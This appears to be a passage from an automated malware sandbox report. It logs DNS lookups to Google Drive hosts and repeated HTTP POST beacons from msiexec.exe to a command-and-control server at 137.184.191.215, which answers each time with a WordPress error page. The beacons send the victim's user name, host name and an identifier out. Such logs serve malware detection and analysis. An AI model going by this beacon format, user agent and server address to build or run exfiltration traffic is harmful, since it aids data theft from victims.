                                Sep 30, 2024 10:02:51.157027006 CEST192.168.2.41.1.1.10xaf0eStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Sep 30, 2024 10:02:50.121891022 CEST1.1.1.1192.168.2.40x1ebcNo error (0)drive.google.com142.250.185.206A (IP address)IN (0x0001)false
                                Sep 30, 2024 10:02:51.164002895 CEST1.1.1.1192.168.2.40xaf0eNo error (0)drive.usercontent.google.com142.250.184.193A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • drive.google.com
                                • drive.usercontent.google.com
                                • 137.184.191.215

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.449740137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:03:37.757720947 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 176
                                Connection: close
                                Sep 30, 2024 10:03:37.762734890 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: 'ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2CF5etq
                                Sep 30, 2024 10:03:40.197251081 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:38 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:40.197280884 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:03:40.197293997 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:03:40.197310925 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449741137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:03:40.290482044 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 176
                                Connection: close
                                Sep 30, 2024 10:03:40.295444965 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: 'ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2CblCyc
                                Sep 30, 2024 10:03:43.206630945 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:40 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:43.206684113 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                Sep 30, 2024 10:03:43.206756115 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
                                Sep 30, 2024 10:03:43.409176111 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:40 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.449743137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:03:43.412652969 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:43.419898987 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:03:45.961947918 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:43 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:45.961966038 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:03:45.961976051 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:03:45.961982965 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.449744137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:03:46.116745949 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:46.121629000 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:03:48.746252060 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:46 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                Sep 30, 2024 10:03:48.746311903 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                Sep 30, 2024 10:03:48.746321917 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                Sep 30, 2024 10:03:48.746332884 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.449745137.184.191.21580416C:\Windows\SysWOW64\msiexec.exe
                                TimestampBytes transferredDirectionData
                                Sep 30, 2024 10:03:48.898016930 CEST241OUTPOST /index.php/039 HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 137.184.191.215
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: 589BD15E
                                Content-Length: 149
                                Connection: close
                                Sep 30, 2024 10:03:48.902903080 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 35 00 38 00 35 00 39 00 34 00 38 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                Data Ascii: (ckav.rujones585948JONES-PC0FDD42EE188E931437F4FBE2C
                                Sep 30, 2024 10:03:51.612746954 CEST1236INHTTP/1.0 500 Internal Server Error
                                Date: Mon, 30 Sep 2024 08:03:49 GMT
                                Server: Apache/2.4.52 (Ubuntu)
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Content-Length: 2557
                                Connection: close
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                                Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
